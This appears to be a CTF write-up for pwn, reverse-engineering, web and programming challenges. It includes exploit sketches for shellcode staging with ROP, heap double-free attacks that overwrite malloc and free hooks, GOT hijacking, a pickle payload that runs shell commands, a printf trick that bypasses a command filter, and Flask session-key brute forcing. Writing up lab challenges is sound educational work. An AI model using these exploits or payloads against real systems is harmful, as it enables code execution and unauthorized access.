Shellcode Master
The shellcode area is mprotect-ed to --x as soon as the first payload is read. The key idea is: do not focus on the shellcode area, but on the stack. You cannot even call any subprocess without a stack.
If we manage to rebuild a stack at some static address and manually form an ROP-like shellcode, we may be able to reuse the shellcode many times, which would let us call read() again to place a richer payload.
After some random trials, I managed to make a reusable shellcode that sets up a basic read() syscall:
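The actual stub is not preserved in this copy; a minimal sketch of the idea, assuming an x86-64 target and a made-up static writable address, could look like this:

```python
from pwn import *

context.arch = 'amd64'

FAKE_STACK = 0x405000   # placeholder: a static writable page reused as the new stack

# Pivot rsp to the static page, read() the next payload onto it, then ret into it.
# Because the stub sits at a fixed executable address, any later ROP chain can
# simply return back here to fetch yet another payload.
stub = asm(f'''
    mov  rsp, {FAKE_STACK:#x}
    xor  edi, edi            /* fd    = 0 (stdin)          */
    mov  rsi, rsp            /* buf   = the rebuilt stack  */
    mov  edx, 0x1000         /* count                      */
    xor  eax, eax            /* SYS_read                   */
    syscall
    ret                      /* return into what was just read: an ROP chain */
''')
```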
The remaining steps:
- read() several times to place ROP payloads;
- mprotect() the shellcode area to be rwx;
- read() to write the final shellcode to the rwx landing pad.
EXP (partial):
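The original EXP is not included in this copy. A rough sketch of the staging described above, reusing the stub from the previous snippet (the binary name, gadget addresses and region addresses are all placeholders), might look like:

```python
p = process('./shellcode_master')     # assumed binary name
p.send(stub)                          # stage 1: the reusable read stub

# Placeholder gadget / region addresses, to be replaced with the real ones.
POP_RDI, POP_RSI, POP_RDX, POP_RAX = 0x401111, 0x401222, 0x401333, 0x401444
SYSCALL_RET    = 0x401555
SHELLCODE_AREA = 0xdead000            # the region that was mprotect-ed to --x

# Stage 2: an ROP chain on the fake stack that makes the area rwx again,
# reads the final shellcode into it, and jumps there.
rop = flat(
    POP_RDI, SHELLCODE_AREA, POP_RSI, 0x1000, POP_RDX, 7,
    POP_RAX, constants.SYS_mprotect, SYSCALL_RET,          # mprotect(area, 0x1000, rwx)
    POP_RDI, 0, POP_RSI, SHELLCODE_AREA, POP_RDX, 0x1000,
    POP_RAX, constants.SYS_read, SYSCALL_RET,               # read(0, area, 0x1000)
    SHELLCODE_AREA,                                         # finally jump into it
)
p.send(rop)

# Stage 3: the final, "rich" shellcode lands on the rwx page.
p.send(asm(shellcraft.sh()))
p.interactive()
```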
p.s. There is indeed a short 22-byte shellcode, but it's totally unrelated. Don't be trapped!
FastNote
The plan:
- Request notes of size 0x80 (+0x10), which is beyond the fastbin range, so a freed one can go to the unsorted bin (for leakage of the libc base address).
- Fill the tcaches to put a chunk into the unsorted bin.
- Fill the tcaches, then do a fastbin double-free; the fastbin double-free puts the same chunk into the fastbin list twice.
- malloc() to drain the tcache list, then malloc() to drain the fastbin list. Since the victim chunk has been allocated and filled with data before it is allocated again, its content gets confused with the freed-chunk layout, where the fd is overlapped with our user data.
- When malloc() allocates chunks from the fastbin lists, the remaining ones are stashed into the tcache list, which lacks validation, so an arbitrary address can be treated as a chunk and returned.
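Putting the plan together in pwntools. Everything binary-specific below (menu option numbers, prompts, note indices, the libc offsets and the final target) is an assumption for illustration only, and it assumes a tcache-enabled glibc without safe-linking:

```python
from pwn import *

p = process('./fastnote')                       # assumed binary name
libc = ELF('./libc.so.6')                       # assumed libc shipped with the challenge
MAIN_ARENA_OFF = 0x3ebc40                       # placeholder: unsorted-bin fd offset from libc base

def add(idx, size, data):                       # hypothetical menu wrappers
    p.sendlineafter(b'>', b'1')
    p.sendlineafter(b'Index', str(idx).encode())
    p.sendlineafter(b'Size', str(size).encode())
    p.sendafter(b'Content', data)

def delete(idx):
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b'Index', str(idx).encode())

def show(idx):
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b'Index', str(idx).encode())
    return p.recvline()

# 1. libc leak: fill the 0x90 tcache bin, then one more free lands in the unsorted bin.
for i in range(8):
    add(i, 0x80, b'A')
add(8, 0x18, b'guard')                          # keep chunk 7 away from the top chunk
for i in range(7):
    delete(i)
delete(7)                                       # unsorted bin: fd/bk point into main_arena
libc.address = u64(show(7)[:8].ljust(8, b'\x00')) - MAIN_ARENA_OFF

# 2. fastbin double free (the A, B, A pattern bypasses the fasttop check).
for i in range(9):
    add(i, 0x60, b'B')
for i in range(7):
    delete(i)                                   # fill the 0x70 tcache bin
delete(7); delete(8); delete(7)                 # fastbin: A -> B -> A

# 3. drain the tcache, then pull A out of the fastbin; the stash loop copies the
#    remaining fastbin chunks into the tcache without any fd/size validation.
for i in range(7):
    add(i, 0x60, b'C')
add(7, 0x60, p64(libc.sym['__free_hook']))      # A again; its fd (= tcache next) hits the target

# 4. a few more allocations walk the poisoned tcache list and return the target.
add(8, 0x60, b'D')
add(9, 0x60, b'E')
add(10, 0x60, p64(libc.sym['system']))          # this chunk overlaps __free_hook
```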
OldFastNote
Very similar to the fast note challenge, except the program was built with the old glibc 2.23.
Without tcaches, the fastbins and unsorted bins can be directly used.
The fastbin path in malloc() still checks that a chunk's size matches the bin it is taken from. Take a look around __malloc_hook:
We can see that it's possible to treat these 8 bytes as u64(0x7f) and place a 0x7*-sized fastbin chunk here to cover __malloc_hook.
In order to get the forged chunk picked from the correct slot of the fastbins, the "chunk forger", i.e. the legitimate chunks freed beforehand, must be in the same size category. Thus the requested note size should be 0x60 (+0x10).
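A sketch of the fake-chunk trick, with the same kind of hypothetical menu wrappers as in the FastNote sketch; libc.address is assumed to have been leaked already via the unsorted bin, and the one_gadget offset is a placeholder:

```python
one_gadget = libc.address + 0xf1247                 # placeholder offset from `one_gadget ./libc.so.6`
fake_chunk = libc.sym['__malloc_hook'] - 0x23       # the stray 0x7f byte acts as its size field

add(0, 0x60, b'A')                                  # 0x70-sized fastbin chunks (0x60 + 0x10)
add(1, 0x60, b'B')
delete(0); delete(1); delete(0)                     # glibc 2.23: fastbin is now A -> B -> A

add(2, 0x60, p64(fake_chunk))                       # A comes back first; its fd now points at the fake chunk
add(3, 0x60, b'B')                                  # B
add(4, 0x60, b'A')                                  # A again; the fake chunk is next in line
add(5, 0x60, b'\x00' * 0x13 + p64(one_gadget))      # fake chunk: pad up to __malloc_hook, then the gadget

p.sendline(b'1')                                    # any further malloc() now jumps to the one_gadget
p.interactive()
```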
At the pause point we can see that the forged chunk has a valid size and is linked to the legal chunk about to be allocated. The mask bits won't be checked when allocating from fastbins, so the chunk is returned as expected.
And the last thing worth mentioning is the one_gadget.
Break at the point where the one_gadget is executed and test these constraints; it turns out that $rsp+0x50 and $rsp+0x70 are likely to be the same and probably 0. So just take the latter two gadgets.
EldenRingII
An even easier version of fast note. There are 4 functions: add / delete / edit / show, and still a UAF which allows writing arbitrary data to freed chunks.
As it shows, the program is statically mapped and the got.plt is writable. So the exploitation can be simplified to:
- fastbin double-free to construct a chunk covering the static notes variables;
- tamper with the notes pointers, so that Showing / Editing operates on whatever the modified notes point to, i.e. arbitrary read / write;
- let DynELF finish the job. We can hijack any entry of got.plt to execute the getshell gadget.
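A sketch of the DynELF step. The binary name and the primitive wrappers are assumptions: redirect_note / read_note / write_at stand for whatever combination of the overlapping chunk plus show / edit gives the arbitrary read and write:

```python
from pwn import *

elf = ELF('./eldenring2')                 # assumed binary name (no PIE, writable got.plt)

def redirect_note(addr):                  # hypothetical wrapper: point a note at addr via the overlapping chunk
    ...

def read_note():                          # hypothetical wrapper: show() the redirected note, return raw bytes
    ...

def write_at(addr, data):                 # hypothetical wrapper: edit() the redirected note
    ...

def leak(address):
    redirect_note(address)
    return read_note()

d = DynELF(leak, elf=elf)                 # resolve libc symbols using only the leak primitive
system_addr = d.lookup('system', 'libc')

# Hijack a got.plt entry so the next call through it becomes the getshell gadget.
write_at(elf.got['free'], p64(system_addr))
```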
ezCPP
Written in cpp, just a boring TEA-like cipher.
babyRE
Xor each key byte by 0x11:
The author put a little trap in this snippet. Don't you wonder what the purpose of setting such a strange signal handler is? Signal number 8 stands for SIGFPE, which is raised when a floating-point exception occurs.
Okay then… where does the floating-point exception come from?
Checking the disassembly, we see that there is a trap hidden from the decompilation.
On StackOverflow people have explained the FPE and div-by-zero stuff. In a word, SIGFPE is raised whenever an arithmetic fault occurs. So the Xor loop only executes 3 times, leaving the key "wtxfei".
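A quick sanity check of the key recovery. The original key bytes are not shown above; "feifei" is my inference from the fact that three xors with 0x11 turn it into "wtxfei":

```python
key = bytearray(b'feifei')   # inferred original key bytes (assumption)
for i in range(3):           # the loop dies with SIGFPE after only 3 iterations
    key[i] ^= 0x11
print(key.decode())          # -> wtxfei
```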
Obviously the cipher bytes are generated sequentially and each one is entangled with its neighboring byte, so the plain flag should be recovered starting from the tail.
Arithmetic
The *SP law discussed in the previous contest applies here as well.
The main() function:
There are some strange indices/offsets in my decompilation. Let's take a look at the attachment file; it will be much clearer:
This is a text file containing 500 lines, and each line has a series of numbers. The program reads the whole file and randomly generates a path that goes top-down, and an accumulator sums up all the traversed numbers to check whether the total is greater than 6752833. If so, it prints the flag hint.
So our goal is to find the path with the maximum sum, and the flag will be the md5 hash of the path sequence.
Obviously this is a DP problem. The max sum at each position is uniquely determined, and it only depends on 2 values: the max sum from directly above and the max sum from the upper left (and the number itself, of course).
So we can solve the problem by traversing every number, recording the max sum and whether it comes from above or from the upper left. Afterwards we take the max sum in the last row, and its path is the answer.
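A minimal sketch of the DP and the path reconstruction. The attachment file name, its whitespace-separated format and the exact path encoding hashed into the flag are assumptions:

```python
import hashlib

# Read the triangle: 500 lines of whitespace-separated numbers (assumed format).
rows = [list(map(int, line.split())) for line in open('attachment.txt') if line.strip()]
n = len(rows)

best = [row[:] for row in rows]              # best[i][j]: max sum of a path ending at (i, j)
frm  = [[0] * len(row) for row in rows]      # 0: came from directly above, 1: from the upper left

for i in range(1, n):
    for j in range(len(rows[i])):
        up   = best[i-1][j]   if j < len(rows[i-1]) else float('-inf')
        left = best[i-1][j-1] if j >= 1             else float('-inf')
        best[i][j] = rows[i][j] + max(up, left)
        frm[i][j]  = 0 if up >= left else 1

# Take the best cell of the last row and walk the path back up.
j = max(range(len(rows[-1])), key=lambda k: best[-1][k])
print('max sum:', best[-1][j])

path = []
for i in range(n - 1, 0, -1):
    path.append(frm[i][j])
    j -= frm[i][j]                           # move to the parent column
path.reverse()

seq = ''.join(map(str, path))                # the path encoding fed to md5 is an assumption
print('md5:', hashlib.md5(seq.encode()).hexdigest())
```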
More Courses
Yet another brute-force-request challenge, hammering the two endpoints (/api/select and /api/expand):
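The actual request script is not preserved here; the general shape of such a loop (target URL, parameters and success condition are all assumptions) is roughly:

```python
import requests

BASE = 'http://target:8080'                  # placeholder target
s = requests.Session()

# Keep hitting the two endpoints until the flag shows up in a response.
while True:
    r = s.post(f'{BASE}/api/select', json={'id': 1})   # assumed parameters
    s.post(f'{BASE}/api/expand', json={'id': 1})
    if 'flag' in r.text:
        print(r.text)
        break
```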
COW
Yet another cowsay challenge.
Some keywords are filtered:
Easily bypass it by taking advantage of printf.
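For example, assuming the input ends up in a shell command and a word like "cat" is on the blacklist, printf can rebuild it from octal escapes (the filtered word and the flag path are assumptions):

```python
# The command substitution evaluates to "cat" at runtime, so the literal
# banned word never appears in the request.
payload = "; $(printf '\\143\\141\\164') /flag"
print(payload)    # ; $(printf '\143\141\164') /flag  ->  ; cat /flag
```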
myFlask
There are 2 points to examine.
The SECKEY used to sign the session is a time-based string, and it has stayed fixed since the server started:
Since it doesn't change, it's easy to brute-force it by mocking the flask session:
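A sketch of that brute force. The exact key format and the session fields are assumptions; the idea is to verify a captured cookie against candidate time-based keys using Flask's own session serializer, then forge a new cookie with the recovered key:

```python
import time
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

captured = 'eyJ...'                      # session cookie copied from a normal response (placeholder)

app = Flask(__name__)
iface = SecureCookieSessionInterface()

now = int(time.time())
for t in range(now, now - 7 * 24 * 3600, -1):    # walk back over the assumed key window
    app.secret_key = str(t)                       # assumed key format: str(unix timestamp)
    s = iface.get_signing_serializer(app)
    try:
        data = s.loads(captured)
    except Exception:
        continue
    print('SECKEY found:', app.secret_key, data)
    forged = s.dumps({'username': 'admin'})       # assumed session content
    print('forged cookie:', forged)
    break
```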
The flag can be retrieved by the send_file() route:
We can make an evil pickle to execute a system command that cats the flag into app.py, and access / to get the result. Note that the server automatically reloads when the source file changes, so the SECKEY needs to be cracked again each time after executing the "write-to-file" command.
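The pickle itself can be as small as a __reduce__ that runs the shell command; the flag path and app.py location below are assumptions:

```python
import pickle, os

class Evil:
    # Unpickling this object calls os.system("cat /flag >> app.py") on the server.
    def __reduce__(self):
        return (os.system, ('cat /flag >> app.py',))

evil = pickle.dumps(Evil())   # embed this wherever the server unpickles user data
```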
华容道
A programming challenge about "Klotski", a.k.a. the「华容道」puzzle.
The game server sets a very severe restriction that requires solving 11 rounds of the puzzle (up to 180 steps!) in 10 seconds. This is very hard for Python to keep up with. I only realized that long after finishing the algorithm, by which time the code had been filled with nested functions and exceptions, so I didn't want to port the algorithm to another language.
I finally managed to speed things up by caching all previously found solutions and burning up the CPU to generate as many solutions as possible with multiprocessing.
Eventually the challenge was won with 280+ pre-calculated solutions.
The solver script is hosted on gist.
Do not use fancy, "more human-friendly" data types / abstractions (the numpy ndarray, for instance) in the hot path: they lack so much optimization that over 60% of the CPU time was wasted on type conversions and data recomposition. The builtin listcomp alone ate about 20% of the CPU time, which was really ridiculous.
That's the real lesson I learnt from this challenge.